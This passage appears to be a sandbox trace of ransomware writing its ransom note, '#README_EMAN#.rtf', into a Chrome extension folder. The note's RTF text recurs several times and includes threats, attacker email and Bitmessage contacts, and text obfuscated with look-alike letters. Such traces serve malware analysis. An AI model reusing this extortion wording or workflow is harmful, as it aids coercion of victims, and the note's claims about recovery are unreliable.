;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.218] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.219] CloseHandle (hObject=0x2ec) returned 1 [0291.219] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\#readme_eman#.rtf")) returned 0xffffffff [0291.219] GetLastError () returned 0x2 [0291.219] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 